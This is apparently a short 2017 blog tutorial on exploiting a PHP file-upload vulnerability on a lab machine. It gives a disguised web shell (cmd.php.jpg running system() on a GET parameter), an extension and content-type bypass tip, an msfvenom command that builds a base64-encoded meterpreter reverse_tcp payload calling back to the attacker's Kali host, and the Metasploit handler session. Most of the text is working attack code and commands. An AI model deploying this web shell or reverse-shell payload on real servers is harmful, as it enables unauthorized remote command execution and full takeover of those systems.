Metasploit, Reverse shell

2017-12-11 21:48:51

Before we start

only for educational purpose

What you need

• Target machine 192.168.0.102 with php app where you can upload file
• Kali linux machine 192.168.0.104

Start

To start play with Reverse shell and metasploit you have to have app where you have possibility to upload php file or php.jpg file :D.

How to test

Try to upload simple php file, if you will meet any problem please play with extension or content type.

Test file

Content-Disposition: form-data; name="file"; filename="cmd.php.jpg" Content-Type: application/x-php

<?php 
    if(isset($_GET['cmd'])) {
        echo "<pre>";
        system($_GET['cmd']);
        echo "</pre>";
    }else{
        echo "lol";
    }
?>

Confirm

You have to confirms that file was uploaded and you can execute it, for example by visiting url 192.168.0.102/uploads/cmd.php.jpg?cmd=ls -la

Metasploit / Kali & Update

I tested this on metasploit v4.16.21-dev, if your version is outdated, consider update

apt update; apt install metasploit-framework

generate exploit

msfvenom -p php/meterpreter/reverse\_tcp LHOST=192.168.0.104 LPORT=4444 -e php/base64 -f raw > msfvenom2.php.jpg

Important you have to edit 'msfvenom2.php.jpg' and wrap payload by

<?php ... ?>

if you are ready please upload this file to server

Hammer time

in msf console, type

msf > 
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse\_tcp
payload => php/meterpreter/reverse\_tcp
msf exploit(multi/handler) > set LHOST 192.168.0.104
LHOST => 192.168.0.104
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

and visit this page: 192.168.0.102/uploads/msfvenom2.php.jpg bumm, now you should have Reverse shell, type something in msf console like "ls" or "pwd" to have more options type "shell"